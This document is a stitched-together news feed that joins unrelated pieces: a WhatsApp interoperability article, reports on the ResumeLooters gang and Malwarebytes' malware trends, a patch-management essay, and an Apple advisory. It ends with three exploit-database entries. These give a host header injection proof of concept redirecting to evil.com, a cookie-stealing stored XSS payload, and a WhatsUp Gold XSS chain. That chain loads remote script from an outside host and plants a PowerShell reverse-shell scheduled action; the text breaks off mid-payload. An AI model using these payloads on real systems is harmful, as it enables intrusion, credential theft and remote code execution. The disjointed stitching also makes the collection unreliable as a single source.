New EU rules mean WhatsApp and Messenger must be interoperable with other chat apps. Here’s how that will work.

A frequent annoyance of contemporary life is having to shuffle through different messaging apps to reach the right person. Messenger, iMessage, WhatsApp, Signal—they all exist in their own silos of group chats and contacts. Soon, though, WhatsApp will do the previously unthinkable for its 2 billion users: allow people to message you from another app. At least, that's the plan.

For about the past two years, WhatsApp has been building a way for other messaging apps to plug themselves into its service and let people chat across apps—all without breaking the end-to-end encryption it uses to protect the privacy and security of people’s messages. The move is the first time the chat app has opened itself up this way, and it potentially offers greater competition.

It isn’t a shift entirely of WhatsApp’s own making. In September, European, lawmakers designated WhatsApp parent Meta as one of six influential “gatekeeer” companies under its sweeping Digital Markets Act, giving it six months to open its walled garden to others. With just a few weeks to go before that time is up, WhatsApp is detailing how its interoperability with other apps may work.

“There’s real tension between offering an easy way to offer this interoperability to third parties whilst at the same time preserving the WhatsApp privacy, security, and integrity bar,” says Dick Brouwer, an engineering director at WhatsApp who has worked on Meta rolling out encryption to its Messenger app. “I think we're pretty happy with where we’ve landed.”

Interoperability in both WhatsApp and Messenger—as dictated by Europe’s rules—will initially focus on text messaging, sending images, voice messages, videos, and files between two people. Calls and group chats will come years down the line. Europe’s rules apply only to messaging services, not traditional SMS messaging. “One of the core requirements here, and this is really important, is for users for this to be opt-in,” says Brouwer. “I can choose whether or not I want to participate in being open to exchanging messages with third parties. This is important, because it could be a big source of spam and scams.”

WhatsApp users who opt in will see messages from other apps in a separate section at the top of their inbox. This “third-party chats” inbox has previously been spotted in development versions of the app. “The early thinking here is to put a separate inbox, given that these networks are very different,” Brouwer says. “We cannot offer the same level of privacy and security,” he says. If WhatsApp were to add SMS, it would use a separate inbox as well, although there are no plans to add it, he says.

Overall, the idea behind interoperability is simple. You shouldn’t need to know what messaging app your friends or family use to get in touch with them, and you should be able to communicate from one app to another without having to download both. In an ideal interoperable world, you could, for example, use Apple’s iMessage to chat with someone on Telegram. However, for apps with millions or billions of users, making this a reality isn’t straightforward—encrypted messaging apps use their own configurations and different protocols and have different standards when it comes to privacy.

Despite WhatsApp working on its interoperability plan for more than a year, it will still take some time for third-party chats to hit people’s apps. Messaging companies that want to interoperate with WhatsApp or Messenger will need to sign an agreement with the company and follow its terms. The full details of the plan will be published in March, Brouwer says; under EU laws, the company will have several months to implement it.

Brouwer says Meta would prefer if other apps use the Signal encryption protocol, which its systems are based upon. Other than its namesake app and the Meta-owned messengers, the Signal Protocol is publicly disclosed as being used in Google Messages and Skype. To send messages, third-party apps will need to encrypt content using the Signal Protocol and then package it into message stanzas in the eXtensible Markup Language (XML). When receiving messages, apps will need to connect to WhatsApp’s servers.

“We think that the best way to deliver this approach is through a solution that is built on WhatsApp’s existing client-server architecture,” Brouwer says, adding it has been working with other companies on the plans. “This effectively means that the approach that we’re trying to take is for WhatsApp to document our client- server protocol and letting third-party clients connect directly to our infrastructure and exchange messages with WhatsApp clients.”

There is some flexibility to WhatsApp interoperability. Meta’s app will also allow other apps to use different encryption protocols if they can “demonstrate” they reach the security standards that WhatsApp outlines in its guidance. There will also be the option, Brouwer says, for third-party developers to add a proxy between their apps and WhatsApp’s server. This, he says, could give developers more “flexibility” and remove the need for them to use WhatsApp’s client-server protocols, but it also “increases the potential attack vectors.”

So far, it is unclear which companies, if any, are planning to connect their services to WhatsApp. WIRED asked 10 owners of messaging or chat services—including Google, Telegram, Viber, and Signal—whether they intend to look at interoperability or had worked with WhatsApp on its plans. The majority of companies didn’t respond to the request for comment. Those that did, Snap and Discord, said they had nothing to add. (The European Commission is investigating whether Apple’s iMessage meets the thresholds to offer interoperability with other apps itself. The company did not respond to a request for comment. It has also faced recent challenges in the US about the closed nature of iMessage.)

Matthew Hodgson, the cofounder of Matrix, which is building an open source standard for encryption and operates the messaging app Element, confirms that his company has worked with WhatsApp on interoperability in an “experimental” way but that he cannot say any more due to signing a nondisclosure agreement. In a talk last weekend, Hodgson demonstrated “hypothetical” architectures for ways that Matrix could connect to the systems of two gatekeepers that don’t use the same encryption protocols.

Meanwhile, Julia Weis, a spokesperson for the Swiss messaging app Threema, says that while WhatsApp did approach it to discuss its interoperability plans, the proposed system didn’t meet Threema’s security and privacy standards. “WhatsApp specifies all the protocols, and we’d have no way of knowing what actually happens with the user data that gets transferred to WhatsApp—after all, WhatsApp is closed source,” Weis says. (WhatsApp’s privacy policy states how it uses people’s data.)

When the EU first announced that messaging apps may have to work together in early 2022, many leading cryptographers opposed the idea, saying it adds complexity and potentially introduces more security and privacy risks. Carmela Troncoso, an associate professor at the Swiss university École Polytechnique Fédérale de Lausanne, who focuses on security and privacy engineering, says interoperability moves could potentially lead to different power relationships between companies, depending on how they are implemented.

“This move for interoperability will, on the one hand, open the market, but also maybe close the market in the sense that now the bigger players are going to have more decisional power,” Troncoso says. “Now, if the big player makes a move and you want to continue being interoperable with this big player, because your users are hooked up to this, you're going to have to follow.”

While the interoperability of encrypted messaging apps may be possible, there are some fundamental challenges about how the systems will work in the real world. How much of a problem spam and scamming will be across apps is largely unknown until people start using interoperable setups. There are also questions about how people will find each other across different apps. For instance, WhatsApp uses your phone number to interact and message other people, while Threema randomly generates eight-digit IDs for people’s accounts. Linking up with WhatsApp “could de-anonymize Threema users,” Weis, the Threema spokesperson says.

Meta’s Brouwer says the company is still working on the interoperability features and the level of support it will make available for companies wanting to integrate with it. “Nobody quite knows how this works,” Brouwer says. “We have no idea what the demand is.” However, he says, the decision was made to use WhatsApp’s existing architecture to run interoperability, as it means that it can more easily scale up the system for group chats in the future. It also reduces the potential for people’s data to be exposed to multiple servers, Brouwer says.

Ultimately, interoperability will evolve over time, and from Meta’s perspective, Brouwer says, it will be more challenging to add new features to it quickly. “We don't believe interop chats and WhatsApp chats can evolve at the same pace,” he says, claiming it is “harder to evolve an open network” compared to a closed one. “The second you do something different—than what we know works really well—you open up a wormhole of security, privacy issues, and complexity that is always going to be much bigger than you think it is.”

WhatsApp Chats Will Soon Work With Other Encrypted Messaging Apps

By Deeba Ahmed
So far, the gang has mostly targeted job seekers in the APAC (Asia Pacific) region.
This is a post from HackRead.com Read the original post: New ResumeLooters Gang Targets Job Seekers, Steals Millions of Resumes

Since emerging in November 2023, ResumeLooters has exploited SQL injection and XSS vulnerabilities to compromise over 65 job-seeking websites.

In November 2023, Group-IB’s Threat Intelligence unit discovered a malicious campaign that targeted APAC (Asia Pacific region) employment agencies and retail companies. GroupIB dubbed the hackers behind the campaign as ResumeLooters.

Overall, 65 websites were targeted, using **SQL injection** attacks and injecting cross-site scripting (XSS) scripts, to steal sensitive user databases storing sensitive information like names, phone numbers, emails, and employment history. The stolen data was then sold on Telegram channels.

Group-IB researchers discovered Cross-Site Scripting (**XSS**) infection on genuine job search websites, aiming to load malicious scripts and display phishing forms. The earliest attacks date back to early 2023, as per the file creation dates detected on the attackers’ servers.

The hackers stole more than two million unique email addresses, targeting users in India, Taiwan, Thailand, and Vietnam. SQLi attacks targeted back-end user databases, while XSS techniques were used to display phishing content on sites and visitors’ devices.

Group-IB has identified ResumeLooters as the second group conducting SQL injection attacks against companies in the Asia-Pacific region, following GambleForce, which has carried out over 20 attacks so far.

The latter group typically targets India, Taiwan, Thailand, and Vietnam, since over 70% of its known victims were located in the region. Researchers also identified compromised entities in Brazil, the USA, Turkey, Russia, Mexico, Italy, and other non-APAC countries.

It is worth noting that Group-IB had recently **unmasked EagleStrike**, a subgroup of the GambleForce hacker group, who exploited simple vulnerabilities. The group targeted 24 organizations across 8 countries, compromising websites in Australia, Indonesia, the Philippines, South Korea, China, India, and Thailand between September and December 2023.

According to the company’s **blog post**, ResumeLooters uses various penetration testing tools, including sqlmap, Acunetix, Beef Framework, X-Ray, Metasploit, ARL, and Dirsearch. Their main vector was SQL injection via sqlmap.

Analysis of stolen HTML files shows the malicious script was executed on at least four websites with some having XSS scripts embedded in the HTML code mainly on devices having administrative access. The attackers’ accounts and advertisements for data sale were discovered in hacking-themed Telegram groups having Chinese-speaking members.

The report highlights the vulnerability of SQLi and XSS attacks on websites, underscoring the need for businesses to implement best practices like web application firewalls and input validation. It also highlights the potential damage caused by these attacks, which are “fueled by poor security and inadequate database and website management” Group-IB researchers concluded.

Screenshot shows source code of one of the authentic job sites containing ResumeLooters’ XSS script

There have been several surprising breaches involving the exposure of employee or job seekers’ data. In July 2022, a North Korean-backed Lazarus group of hackers, posing as IT freelancers, used a fake job offer to **infiltrate** Sky Mavis’ network.

More recently, in January 2023, Hackread **reported** independent security researcher Anurag Sen discovered a misconfigured server belonging to an Enterprise Resource Planning (ERP) Software provider in California.

The Elasticsearch server exposed the personal data of over half a million Indian job seekers, as well as the company’s employees and client records from companies like Apple and Samsung. The server had been publicly accessible without any security authentication or password since late December 2022.

****RELATED ARTICLES****

1.  **Teen hacked Apple twice hoping for a job**
2.  **Hackers used fake job website to scam jobless US veterans**
3.  **Fake LinkedIn job offers scam spreading More\_eggs backdoor**
4.  **Fake LinkedIn Job Offer Used in Stealing $625M from Axie Infinity**
5.  **Interpol Busts Human Traffickers Luring Victims with Fake Job Ads**

New ResumeLooters Gang Targets Job Seekers, Steals Millions of Resumes

The State of Malware 2024 report covers some topics that are of special interest to home users: privacy, passwords, malvertising, banking Trojans, and Mac malware.

Released today, the Malwarebytes State of Malware 2024 report takes a deep dive into the latest developments in the world of cybercrime. 

As home users, many of the threats we cover will only affect you second hand, such as disruptions after a company suffers a ransomware attack, or when your private information is sold online after a data breach. Sadly, there’s not a lot you can do to prevent incidents like these yourself, other than stay on top of the news and protect yourself against identity theft. 

But other threats you can do something about. So in this article we’ll focus on what threats affect you directly and how you can protect yourself. 

**Privacy **

In the last year, the UK’s Online Safety Act attempted to challenge the status quo for social media and messaging companies. The act was widely interpreted as a demand that companies scan users’ messages for illegal material, and is a first warning about the directions in which privacy may continue to be threatened in the name of greater good.  

It also acts as a reminder to be careful about what you share, even if you are under the impression that you are using the internet securely. We have seen news of ChatGPT leaking user’s information and law enforcement asking for backdoors in encryption routines. 

**Passwords **

Google and Microsoft made good on their promise to back passkeys, an encryption-based alternative to passwords that can’t be stolen, guessed, cracked, or phished.

We’d like to see more companies embrace new methods of authentication and wave passwords goodbye: Too many breaches have shown us that user education only works for those that were already doing the right things. Keeping track of the hundreds of passwords an average user has, along with the relative complexity of using a password manager have convinced us it’s time for a better alternative. 

**Malvertising **

If the last year has taught us something, it’s that scammers and malware peddlers can afford to buy sponsored search results and outbid the brand owner so that their links come out on top. Cybercriminals create Google Search ads mimicking popular brands, which lead to highly realistic, replica web pages where users are scammed or tricked into downloading malware. 

Despite efforts on the side of search providers like Google, the cybercriminals remained one step ahead, able to consistently bypass ad verification checks all year. The type of malware that’s used varies with each campaign but infostealers (which gather information from your computer, such as usernames and passwords) were the most common type. 

**Banking Trojans **

Banking trojans are one of the most serious threats facing Android devices. Banking trojans come disguised as regular apps like QR code scanners, fitness trackers, or even copies of popular apps like Instagram. 

The malicious app asks the user for permissions that allow it to monitor what happens in other apps and will then create overlay screens for legitimate apps. This allows them to capture login credentials and even multi-factor authentication (MFA) tokens.

**Mac malware **

The days of “my Mac is safe” and “Macs don’t get malware” are definitely over. There are many signs that criminals are taking note of the platform’s increasing popularity by enabling attacks to target both Windows and Mac users at the same time. 

Contrary to outdated beliefs, malware for Macs has always existed, it was just considered less serious since most Mac malware was adware or potentially unwanted programs (PUPs). This is changing. For example, in September, 2023, Malwarebytes discovered a cybercriminal campaign spreading Atomic Stealer (AMOS) malware to Mac users through malicious ads. AMOS malware can steal passwords from browsers and Apple’s Keychain, as well as grab files.

**Malwarebytes  **

Malwarebytes has solutions to safeguard individuals’ data and identities. We can protect your Android and iOS devices, Macs, Chromebooks, and Windows systems. We also have software to protect your identity, safeguard your online privacy, and block unwanted ads and trackers.

 State of Malware 2024: What consumers need to know 

“If molecules really were the new microchips, the promise of remote gene editing was that the body could be manipulated to upgrade itself.” An exclusive excerpt from 2054: A Novel.

2054, Part II: Next Big Thing

This is the fifth and final part of Vincent Danen’s “Patch management needs a revolution” series.Patch management needs a revolution, part 1: Surveying cybersecurity’s lineagePatch management needs a revolution, part 2: The flood of vulnerabilitiesPatch management needs a revolution, part 3: Vulnerability scores and the concept of trustPatch management needs a revolution, part 4: Sane patching is safe patching is selective patchingThere is an intersection between “compliance” and “security” but it’s wise to realize that compliance does not equal security. Compliance, when don

_This is the fifth and final part of Vincent Danen’s “Patch management needs a revolution” series._

*   _Patch management needs a revolution, part 1: Surveying cybersecurity’s lineage_
*   _Patch management needs a revolution, part 2: The flood of vulnerabilities_
*   _Patch management needs a revolution, part 3: Vulnerability scores and the concept of trust_
*   _Patch management needs a revolution, part 4: Sane patching is safe patching is selective patching_

There is an intersection between “compliance” and “security” but it’s wise to realize that compliance does not equal security. Compliance, when done well, can be a driving force in improving the processes and technologies in use in an environment to improve overall security posture. But, a focus on “check the box” security, which is compliance dressed up like security without a fundamental understanding of how security practices and processes should be applied to decrease risk in an environment, is detrimental. This is analogous to someone deciding that rotating passwords was a good idea and then 26 years later coming back and saying “well, that didn’t help.” It was expensive, confusing, and it didn’t make any material difference.

The same is true with patching. Patch those things for which patches are available, absolutely. Those patches were created for a reason, usually because the vendor felt it was risky enough to warrant the code change (which in itself introduces risk). But those things for which no patch is available? Here is where one must look at the risk: if rated Critical or Important, absolutely look for those patches! If Moderate or Low, which are typically less likely to be exploited and if exploited less likely to be severe, pursuing those patches does not measurably reduce risk in your environment. Time and effort would be better spent on things that substantially reduce risk. We discussed this cost to patch in the prior article of this series.

It’s also worth noting that this demand for all patches is a uniquely open source phenomenon. These same demands cannot be made of proprietary vendors who have no obligation to disclose vulnerabilities they do not intend to fix. This is not the case for open source vendors who cannot hide vulnerabilities behind opaque walls and inaccessible source code. Ironically, the open source benefit of transparency is the paradox that open source vendors grapple with. On the one hand, transparency and source code availability affords a number of benefits, such as being able to find vulnerabilities faster, mitigate them without a patch being available, correct software deficiencies yourself, and so forth. On the other hand, for those who insist that “compliance” is security, every vulnerability has a box beside it that needs to be ticked, and there’s no hiding it. Proprietary vendors have no need to describe why an issue isn’t overly risky – they just don’t disclose it. Open source vendors are not afforded that same privilege.

At the end of the day, open source transparency extends more power to end users, even when considering security concerns, than proprietary alternatives. But in order to truly reap those benefits, end users must have a better understanding of risk, or patching becomes an expensive rat race for vendors who are producing the fixes, and for end users who are consuming, testing, and deploying those fixes.

At some point we as an industry, and particularly those of us who are security practitioners, have to realize that the advice we’ve given for years is simply bad advice. It was easy enough to patch everything when there were small numbers of things to patch and software was, by today’s standards, quite straightforward and uncomplicated. It is exceptionally more difficult, and risky, to patch tens of thousands of things and introduce significant change in much more complex environments.

It has been discussed a number of times, but the old ways of doing things are hard to shake. Whether it’s the sunk cost fallacy (“we’ve always done it this way and we’re invested in it”) or sheer misunderstanding of risk, we continue to prioritize the things that don’t matter and don’t focus enough on the things that do. And the result? Breaches and significant security events continue to rise, despite those efforts. What we continue to try to do doesn’t scale, and frankly it isn’t working.

The solution is when we know better, we should do better. We have the information and knowledge now to deduce that a risk-based approach is the best approach. And we’re not alone, a simple Google search reveals hundreds of thousands of results, most from the last few years, including frustration from upstream communities. Others are discussing it and challenging the old ways of thinking, which is good! Using the crude illustration from the last article in this series, it doesn’t make sense to spend $1.6M when $295k will afford the exact same risk reduction. And even then, that risk reduction is minuscule when accounting for the whole picture. Take the rest of that money and invest it where it makes sense, such as tooling and training that helps. After all, in nearly every other technological aspect of security, we’ve moved on from failed techniques, yet we (as an industry) persist in this one particularly expensive and faulty belief.

One recent example of this change is that in May of last year, Google made the decision to no longer assign CVEs to Low or Moderate issues. They affirm they will continue to focus on those more severe vulnerabilities that are an actual risk to the ecosystem.

Now is the time to move on. It’s time to realize that not all vulnerabilities matter and the risk of having a list of CVEs with no patches to apply is less than the risk of not managing our security perimeters, not having appropriate separation of duties, not following principles of least privilege and zero trust, and not employing appropriate technologies to disrupt and detect determined attackers.

There are a number of technology areas to invest in. Secure configurations, logging, monitoring, employing techniques like Lockheed Martin’s cyber kill chain, employing zero trust strategies, using identity and authentication properly, and so forth. These will yield more meaningful and measurable results, if the goal is truly risk reduction. This is where the bulk of organizations experiencing a breach appear to be lacking – the adoption of these crucial technologies and techniques.

Vincent Danen lives in Canada and is the Vice President of Product Security at Red Hat. He joined Red Hat in 2009 and has been working in the security field, specifically around Linux, operating security and vulnerability management, for over 20 years.

Read full bio

Patch management needs a revolution, part 5: How open source and transparency can force positive change

SISQUAL WFM version 7.1.319.103 suffers from a host header injection vulnerability.

    # Exploit Title: SISQUAL WFM 7.1.319.103 Host Header Injection# Discovered Date: 17/03/2023# Reported Date: 17/03/2023# Exploit Author: Omer Shaik (unknown_exploit)# Vendor Homepage: https://www.sisqualwfm.com# Version: 7.1.319.103# Tested on: SISQUAL WFM 7.1.319.103# Affected Version: sisqualWFM - 7.1.319.103# Fixed Version: sisqualWFM - 7.1.319.111# CVE : CVE-2023-36085# CVSS: 3.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)# Category: Web Apps# Reference: https://github.com/omershaik0/Handmade_Exploits/tree/main/SISQUALWFM-Host-Header-Injection-CVE-2023-36085A proof-of-concept(POC) scenario that demonstrates a potential host header injection vulnerability in sisqualWFM version 7.1.319.103, specifically targeting the /sisqualIdentityServer/core endpoint. This vulnerability could be exploited by an attacker to manipulate webpage links or redirect users to another site with ease, simply by tampering with the host header.****************************************************************************************************Orignal Request****************************************************************************************************GET /sisqualIdentityServer/core/login HTTP/2Host: sisqualwfm.cloudCookie:<cookie>Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Linux"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9****************************************************************************************************Orignal Response****************************************************************************************************HTTP/2 302 FoundCache-Control: no-store, no-cache, must-revalidateLocation: https://sisqualwfm.cloud/sisqualIdentityServer/core/Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Content-Type-Options: nosniffX-Frame-Options: sameoriginDate: Wed, 22 Mar 2023 13:22:10 GMTContent-Length: 0****************************************************************************************************██████╗  ██████╗  ██████╗██╔══██╗██╔═══██╗██╔════╝██████╔╝██║   ██║██║     ██╔═══╝ ██║   ██║██║     ██║     ╚██████╔╝╚██████╗╚═╝      ╚═════╝  ╚═════╝                ****************************************************************************************************Request has been modified to redirect user to evil.com (Intercepted request using Burp proxy)****************************************************************************************************GET /sisqualIdentityServer/core/login HTTP/2Host: evil.comCookie:<cookie>Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Linux"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9****************************************************************************************************Response****************************************************************************************************HTTP/2 302 FoundCache-Control: no-store, no-cache, must-revalidateLocation: https://evil.com/sisqualIdentityServer/core/Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Content-Type-Options: nosniffX-Frame-Options: sameoriginContent-Length: 0****************************************************************************************************Method of Attack****************************************************************************************************curl -k --header "Host: attack.host.com" "Domain Name + /sisqualIdentityServer/core" -vvv****************************************************************************************************

SISQUAL WFM 7.1.319.103 Host Header Injection

Apple Security Advisory 02-02-2024-1 - visionOS 1.0.2 addresses a code execution vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-02-02-2024-1 visionOS 1.0.2

visionOS 1.0.2 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT214070.

Apple maintains a Security Releases page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

WebKit  
Available for: Apple Vision Pro  
Impact: Processing maliciously crafted web content may lead to   
arbitrary code execution. Apple is aware of a report that this issue   
may have been exploited.  
Description: A type confusion issue was addressed with improved  
checks.  
WebKit Bugzilla: 267134  
CVE-2024-23222

Instructions on how to update visionOS are available  
at https://support.apple.com/HT214009 To check the software   
version on your Apple Vision Pro, open the Settings app and choose   
General > About.

All information is also posted on the Apple Security Releases  
web site: https://support.apple.com/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmW9aewACgkQX+5d1TXa  
IvrZNxAAlUqs8RDuCeo/N9dUGSvXociXTXDrbhZzKZeQ+RQjLNnW9fyUailHNcMM  
a2Udpkty1/eDQIWgZxTl8ftcBycxeEsatn29UpYaWNsRLuYPInTKr8LCdv4evUJm  
KTnW4xyprG5hKbiVKV17inpxLwF0YyziC5ZTa670f1POT9B7tYRvlj0rvp8OK9+V  
Gh/9gEKEwwhvc7DnwvtxIJsNZf0TPcRtjNBYxgXEghT8+a5H3dERVWiMyLepAh8X  
Vrf5Hfy0SI792u53LIvN8zP2nLuQr3Sw0ZxxJsUOGNWmyg1SoF2jmAh56Ksh/MbV  
fS4EhyfaZTSR4YycFZtuUozAoFiZ+Sk62xTTZGV64DxGvVu6Vr0gOp4K65fNy1QU  
L6nkwc89G1TSHdbVlCLtP8VZYFpFlAOmtYklb7e0oGYYrY5QZmQoXoTMmcK/sTcJ  
+mBsfHU+zXOXRDQ+XSg/JLtlUy5+jV8JOnT46At+sueVvnRvOyg12Wjuo4dzuzNh  
1zDVnmfVRnRRmT6ZXHlTEMcaTmnCk73jZEP00maem6DGHYCjcVAW8MqK3IcHv79U  
YKQ+t14ooVbskTPdDHrAzznK3nUQNkC8FytW8Z3bNhdpl1yMKyFJPYROPxRMTJQN  
vhZ4nKx1Lz3yaCJsH3dkuKOLvggM9vz/oa3Qv8NKh1loShhj0JU=  
=pJSu  
-----END PGP SIGNATURE-----

Apple Security Advisory 02-02-2024-1

Gym Management System version 1.0 suffers from a persistent cross site scripting vulnerability. Original credit for this finding goes to Jyotsna Adhana in October of 2020 but uses a different vector of attack for this software version.

    # Exploit Title: GYM MS - GYM Management System - Cross Site Scripting (Stored)# Date: 29/09/2023# Vendor Homepage: https://phpgurukul.com/gym-management-system-using-php-and-mysql/# Software Link: https://phpgurukul.com/projects/GYM-Management-System-using-PHP.zip# Version: 1.0# Last Update: 31 August 2022# Tested On: Kali Linux 6.1.27-1kali1 (2023-05-12) x86_64 + XAMPP 7.4.30# 1: Create user, login and go to profile.php# 2: Use payload x%22%20onmouseover%3Dalert%28document.cookie%29%20x%3D%22 in lname field.# 3: When entering the profile.php page, document.cookie will be reflected every time.# AuthorThis vulnerability was detected by Alperen Yozgat while testing with the Rapplex - Web Application Security Scanner.# About RapplexRapplex is a web applicaton security scanner that scans and reports vulnerabilities in websites.Pentesters can use it as an automation tool for daily tasks but "Pentester Studio" will provide such a great addition as well in their manual assessments.So, the software does not need separate development tools to discover different types of vulnerabilities or to develop existing engines. "Exploit" tools are available to take advantage of vulnerabilities such as SQL Injection, Code Injection, Fle Incluson.# HTTP Request POST /gym/profile.php HTTP/1.1Host: localhostContent-Length: 129Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Cookie: PHPSESSID=76e2048c174c1a5d46e203df87672c25 #CHANGEConnection: closefname=test&lname=x%22%20onmouseover%3Dalert%28document.cookie%29%20x%3D%22&email=john%40test.com&mobile=1425635241&state=Delhi&city=New+Delhi&address=ABC+Street+XYZ+Colony&submit=Update

GYM MS 1.0 Cross Site Scripting

WhatsUp Gold 2022 version 22.1.0 Build 39 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: WhatsUpGold 22.1.0 - Stored Cross-Site Scripting (XSS)# Date: April 18, 2023# Exploit Author: Andreas Finstad (4ndr34z)# Vendor Homepage: https://www.whatsupgold.com# Version: v.22.1.0 Build 39# Tested on: Windows 2022 Server# CVE : CVE-2023-35759# Reference: https://nvd.nist.gov/vuln/detail/CVE-2023-35759WhatsUp Gold 2022 (22.1.0 Build 39) Stored XSS in sysName SNMP parameter.Vulnerability Report: Stored XSS in WhatsUp Gold 2022 (22.1.0 Build 39)Product Name: WhatsUp Gold 2022Version: 22.1.0 Build 39Vulnerability Type: Stored Cross-Site Scripting (XSS)Description:WhatsUp Gold 2022 is vulnerable to a stored cross-site scripting (XSS) attack that allows an attacker to inject malicious scripts into the admin console. The vulnerability exists in the sysName SNMP field on a device, which reflects the input from the SNMP device into the admin console after being discovered by SNMP. An attacker can exploit this vulnerability by crafting a specially crafted SNMP device name that contains malicious code. Once the device name is saved and reflected in the admin console, the injected code will execute in the context of the admin user, potentially allowing the attacker to steal sensitive data or perform unauthorized actions.As there is no CSRF tokens or CDP, it is trivial to create a javascript payload that adds an scheduled action on the server, that executes code as "NT System". In my POC code, I add a Powershell revshell that connects out to the attacker every 5 minutes. (screenshot3)The XSS trigger when clicking the "All names and addresses"Stage:Base64 encoded id property:var a=document.createElement("script");a.src="https://f20.be/t.js";document.body.appendChild(a);Staged payload placed in the SNMP sysName Field on a device:<img id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vZjIwLmJlL3QuanMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7Cg== src=https://f20.be/1 onload=eval(atob(this.id))>payload:var vhost = window.location.protocol+'\/\/'+window.location.hostaddaction();async function addaction() {var arguments = ''let run = fetch(vhost+'/NmConsole/api/core/WugPowerShellScriptAction?_dc=1655327281064',{    method: 'POST',    headers: {        'Connection': 'close',        'Content-Length': '1902',        'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft Edge";v="102"',        'Accept': 'application/json',        'Content-Type': 'application/json',        'X-Requested-With': 'XMLHttpRequest',        'sec-ch-ua-mobile': '?0',        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33',        'sec-ch-ua-platform': '"macOS"',        'Sec-Fetch-Mode': 'cors',        'Sec-Fetch-Dest': 'empty',        'Accept-Encoding': 'gzip, deflate',        'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4'    },    credentials: 'include',    body: '{"id":-1,"Timeout":30,"ScriptText":"Start-process powershell -argumentlist \\"-W Hidden -noprofile -executionpolicy bypass -NoExit -e 